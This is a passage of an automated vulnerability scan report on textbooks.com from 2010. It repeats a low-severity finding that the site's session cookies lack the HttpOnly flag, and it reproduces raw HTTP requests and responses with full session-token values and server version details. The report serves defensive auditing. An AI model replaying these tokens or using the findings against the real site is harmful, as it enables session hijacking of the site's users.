TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=CdH9LFYD8Vfry2EqmBGV%2B1LHC2Md9X2lIMPio%2FZHBDjj4lVYpYgFIgBJ2fDWTkgw9xwkv7JTa3ODRzvHY5dDJ187ZpfbF2xzOcgnuFAkv6DjdOCYMBmRszo%2Bt3tHlCCgViu%2FVMvYjSfG5bArg%2BaI7JjQroKb4QrzZHjip%2FKl7yEj%2FlCOWSL3e8A3nj4v1x7I4E5wRb7OKIqQmRWFocfauhZg6DBqOHAqfSXI6iVzS%2FvAm7%2FozZa2KLjjKqrhvw0JtsOpvSwUWDDrNfrSe8dZZWgDFYm0rlXdG8AXSKsFKKYE66tVpC8kgBXpRqIFjjMIirpNo%2F68Lhjtk5AxY1yIDT%2BOCOpryeVSfwXDLbJs5waIwRrOxK1VH7ISOVueu%2BbpS1gJw5bYRsAWLJIoQgjgYkNWc5wBxC7ykmjMyhtdgG35qEGcVeQTB01Q9nLqyjJyP83oPXAeGgupg0K7BIa7omAQPLXmG1OCeCYhxU5Uo8VgAaNNVjqNcA5RhO5xq5O%2FTl7vKdNE4zNaC5%2FN8fVAmfHjCjyKMvkFGW3sRHJ40p4AfJxSZGaXn92bx2VgohnBZfsUn0lSJ%2FDVp6nYl608o6In5ET35pQZFXiPKm%2F1ZvVHOilc%2B7ORIa0oZjLjqI3sBUiQ%2FbWqZj83T527z%2Fl3OcnyHIrm3k2sJ7G%2FpAoUurp6oUCFlofRkxk8ytG61j6%2BduJJrOURZcTpBLK9XPVgU5yTnkwSKBO%2BnwfvOS2XKzs6T1kPMUfZmAu%2B65HJ2QI8w91XdFq7ERP2wjH38FionnVC0M%2FuteGwFVv0nTjbFkLy3zabxNsPrqcsYB9lJGTcq2WZJOvxCve7uuPaz1RIveOtFQmAzvpHeHGJcZZO47MDIEZu4o57uEieUQVpKettpmGInz8G0LLzO%2BM%2B8QJyL3zCVcDNIQVpOv0w0LTlwd7NzCbABOGch%2BIW2IReJaYpiZoOIj%2FBSQRZvsrjShwWVO4GPGeQg5VCAeW0mVBSzgkLXXYgorH3gmvaymsuyhKQq6sPRpZ7%2FzPt9cIREY66cvfSZNH6BnUXyEIVD9p12u%2Fgz4DyUbMizmrv6D8LUH2v%2Fty%2FkZ1UT8BwxQGlXF53%2FVZrNbyDdEZpQU%2F%2BcoHql3jDCWLWEKwFn%2BE%2FPtr%2Fj3oEpsZj1IQkiEJ5PPDJM67zojrJI4kadTQEGZCfYYolV8MRO5s4C7o7fZAPmNw039hH9PNVR2wuy%2Bw0HeOfUshbA%2B49mILqIPxYgyPb1TlsjpKk9kOZlqpLBP3vwGM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=OfgoPtZ5xO56sECzXho%3D; expires=Mon, 26-Dec-2011 13:52:34 GMT; path=/; domain=.textbooks.com
Content-Length: 110012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=lWW7095Hg1ig8uQW8L4tHoLuc%2FIHIv69fbY%2F7AeSB39DPMmHu7wprb0Q0HEuveRv%2FF6JHL43wqoIKy9W9TrEcCjN66qOeeK7DMBiEcghYgg43a1eRWpySFlrfs0nzwjAeELsCPucykDEds%2FaasQo%2BMz913BNOMqADlkMonkYW9MBONQh0NN7%2Bgn00j1ZrzgQwqf0OUeb9BDYW21oVsj%2FdJdR0akhOZK%2F51wY6BfRV5EgGTM65n%2BFRNRya%2BiLb7JahucPeAbl9x%2BmhOOnO9%2B3vXyI6sQBNk%2BTY5acFyexwVXFLhMPsgJOHhbbt5Xu5IdSMPJ5mwbFVdFqPn0G23%2FsgxWXSWdGDnwAjpfPCi7szYoWTvS4LGvp0bPyoGV64TqdRQST3gkjLXC%2BbjahLgjKOqTj%2FbzQT73DSfMceGTBMfbq%2FkPKTmPT%2FGtUuHOaMhZnFCbq%2B1myev%2BXhT27fOdn4BM6L%2Fq%2FAOHmmRRCrMvZYIIaKogio7haqhIXuzppk1jI5qJaX1kozxHPq5IWmDhRpQLku0MYJlkkU3BbvxgM9zc1ytri%2BSShq9%2FhTtxdwvxu6fP54Qbb639bOftEwkkZ17oex1B%2BbtT08sH6SDsD1RAWJbMd%2FZhco949cbNtw%2FQDSx1DqDAkQoXh%2BduOs%2BSDVxd%2BRU7UcSMHjn5l9oZNqgudx4QOQStpPUhUB%2BQzChVikzK6JsdK%2Fog4ubjTvS2hMxgCLw25pkiH%2B1XnQzeR59%2FWJX%2BOFhdfEbdfCHehsxmIBAcgQ49heBG%2BGipmvLn7TmbTDe51UHYZtp%2FpPMKf%2By8P26TxRMmcJHiJpCosEzKZpVrFuwfiphEoFflcxAxA3kcAMm8pOOlf1FYYkPSvwRCejf5OPPOdLo5KJ0Cpru9WBOvS8%2Finc%2Bqll%2FnFeyHvvk0rWbc3ijPVV7DAaVu8ebTjdB1nJBgYz6ebzHnYvLfhG0DSmbFSifE5Ec7auE2okDMny0YRaQ%2BWN3TokOyNLEKwxuMkCpS0V3kJhmIMjdidEBg97nDyiD8SeC1jRSMxmi3VZ2KHlEn6Z2yfS%2FK2QEf8d19bM3zDIKDLov320SsOOGFH5KTfGYqYqb2rHg8%2FtVYEOATQx92S736NdiA6MdC2IE5Jiufr6Vp4xzmBa8OMrZl8qPdzXdVUks5bTTqiZiZl9UK0X4aE0JsDz6YYNh1MYd8JYJImlyClsU%2FFSyB8h5q54jI2zcv%2FZ0fTzLxvWyE%2FLW5L3yLANRhETaRLMB7IOL3Gu011Zc3dPr0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=r9T1CLykg7iNlM9mW4g%3D; expires=Mon, 26-Dec-2011 13:52:47 GMT; path=/; domain=.textbooks.com
Content-Length: 124683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/S/Social-Sciences.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/S/Social-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=xRQX55189n8zA%2FwnIp1C0b%2F9aBYes8fGlayALGU4Y%2FO38uipRddVmnRDHMN4k%2BItUZODbUe8ekOmkjKJiKXhFx1uP%2F9mLKCdMr4rA%2F7hQ%2B%2BzmI9Ov89MnWeZKHmKi0UT%2FEwu368A%2Bh0LAhbUJMD1ZLPSU9cYltYN2hv03GIZ%2BU8Xz7hlQRm4YQ0%2B6wRLn9EUrpd%2FF716MjY2ZCO3%2BUot8DYeFpodOjX%2FKOYYx0t3KsVyAKRubho5BMJh%2Bfyy%2BJXDdRGM%2FyJIX80Ee46YKxd9y4ZxQnorvbw6O%2Fx3jO9KGLjeSewCeNj0rwbQ5RkaseMHh9OMScRKZQOm18NARKFo7%2B6jQy2eX%2FjVaA1JtXFrUjWCJQvcXaNfglwVJmgYzROpgyK1JSAMBffOZOp5%2BPA9dM2V1HbkWc7pr4U5dYc8zXzBVi4GiT4%2BQpuX9q6yaOWWx9GSLClmeMt76kvQ4M3TStY7mXT9Qxr4EtUIj6qWHcuD9060xc%2BMCD3IpEA44dzi%2FasaSBjO5juu1heSznTBD5NvGwg7eNQ%2FGdoyKJQc7sVHAAoMdxqVF6UatbucxEh04tC3j1tgpSOUrNnfuSV%2BJvHk0NXKZd1NQPCKONaZArniF2A3oMN%2BAnzC14T6R%2Fk91cNFcBvKfMOvqoYyRykzFJUhgA8M4rYmxkm981YU7pPy2Ob8kdrg71TWG2yMtt0%2F4ZLDhxSGghzbSRUVX07N121ZGHsXtHXx3dEwsm0jUYQBBHxQyJDsEnrBw55GW80Ts1NkLVgP%2Fz9nevbJ28rFTrs5XegaNssPcaIofSADlpaKYPKxDtdslIBlz1LsBkZ%2B0V0s6KMNBpQloypKpkScwlDGj%2BHUrnAOexucfo%2BJ1O1ztRiJKFDzyfWN5C9Q3YsftQpVqYZ5NCyxOswNcNhzG1QHvm9QCs7lsuhZQq%2F0X3jQeR3jKmWP5xX6E6NNSX%2F17h5Tk%2F5rgyR2GC%2BDBBcJ7jtjd1Ivhre6NrHXV7fj%2B0r514Xc61RwSQV7hDzpo4aE3U0opmnLBXLw2Wsr2NsLihuZdg6GKV614VLtP8hWTIEciJii35QFPM82aSebcStWKxDdVT9jui%2F9HDiwrNRZt%2BC%2F5Vxoeg%2F5jNbhkQ3ybr6ADZw1nuxUCZem%2BlXmqYvrKgNEbngd5EXIf1c8a17ZwvFECJqUxCpbXVfq2yGeGhdPhPrxsZAVkGgO3aSDFZnm4OoiZLZQ4VHpPyAqec2X1vww5h%2FRIzeekFWbnCtNVHopWLG71yEY2nrxMKo%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=fu4pT4XxuU2DnO1wKnI%3D; expires=Mon, 26-Dec-2011 13:52:55 GMT; path=/; domain=.textbooks.com
Content-Length: 149776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=1gyLXHBIfSMKPz%2Fw5IiqSbZ6agOmagd%2B9zhguG5Vt%2BrxTeTjBNSgMTE7jL8Ji9QU4cdawByalwZL9n0brAdnFudnztnjTPBayhZPb8FpYWBkinyNXyQdxVVhl5ADyHN7Njc%2Bi9tOVckiAE%2FXrUokgWoLMgOYdhEafJyJ%2BINyX0WJDiBkhSsaAman7d0oTEWEivU3sWpP5hQbmrdICIewCkt%2F7uPfp8wxtXCmAxB%2BYBEDAaLX5ZHAtj4lasxbloPgb06LFNhEyx1jVTQj%2BUSIDEBNonP9XMNVWzZWwTlf%2BgCtZLYRQ9PFG1B%2BlGJ1m77fMCei8JR89%2Bp2NVJsULWKsIsRVv1f81n3k6LqWDQHLqX51sZ6qVB3By3MhsKrJcOS6wtZAmt7Y5pqbH%2F0v8n942mb4lb934eNLnC4MtRXXyL9XO%2FHaWJ%2F2DeQ4AuEAC2rP9p1AsBnHmNjfUkgt8waYfeUUqUMYPopyN0dTpvblsPc9lBc3Ao3MfzqpMsn2VThteurH9p02FcyYbn8iyxD7tBncAz89FtZ0tHo8DspQb7w%2FxVhbUm5cahrdkSKNNlOO8whuXah9Kg9DvtjUDSDnsGlLAmbe5NLTsnsznKJVZyGqw2KRNaeKXNFqGYN5OO69dPPzDl%2BOoDa678%2BMW2%2BNdVhu%2Fdcje0SDbimNqwdLIVwi%2FvjnvxYfgKF08j9beUaRUYcWPehchsKK11UbkrWdicvDPYqSKDYqJKWC8G3Nr2c11u%2Fl4YlaR00WOldYB0fVgyvQx%2FdFwEvShbLYN%2FWhHBGfZ%2BkQWkFFyqxSV07OtqD4sY%2BBJo4PrfsOcj%2B1XFFCXvnXdwL0nyeCYLHWtMjVQmgFKOquaZlGZGzZoucbjoYjgotpgVGX1HbAkcTGm%2F14VbafyhS3eVWfs5rfLWL4qC6sKq26y%2FgcMDcaVlyYw0SFFuJbxW3QSWciW%2Fc8Cq62edTkCGrq%2FkC20F9yiqEJo5aQ5z1zofKQ1J278fbiNIqV5JrVkUmpa1isbRPwzZl9DqbrqoXFN683FiZF0szTmPFyUWnTXh%2BCZlIjSEoo%2Fgs5UNQScJg7HIYy9Jp3MJAREly8HnXCCPRw8Rpnyl2gp%2FkOl5ebcOf2xNJeXfT6KN0YBalioHGw0BzmqdHy0WZlOmdzpsbn4jPmtrj2TH1htEHHTLzPL6lPAB6vW1VRvrJECH7CHpt715eZZKt8ORsi7L06jU75greL4IaQR850zQeoOi4V0XPnwMk%2FvZnPxOk0w2Z2%2BarOdrS5NY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RYtl1QdxWBaKvyvtQEw%3D; expires=Mon, 26-Dec-2011 13:52:06 GMT; path=/; domain=.textbooks.com
Content-Length: 155433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/V/Vocational-and-Professional-Education.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TBSESSION and TBPERSIST (see the two Set-Cookie headers in the response below). TBSESSION, by its name, appears to contain a session token, which increases the risk associated with this issue: without HttpOnly, any script running in a page on this domain, including script injected through a cross-site scripting flaw, can read the cookie through document.cookie and send it to an attacker. Review the contents of the cookies to determine their function.

Request

GET /Catalog/V/Vocational-and-Professional-Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 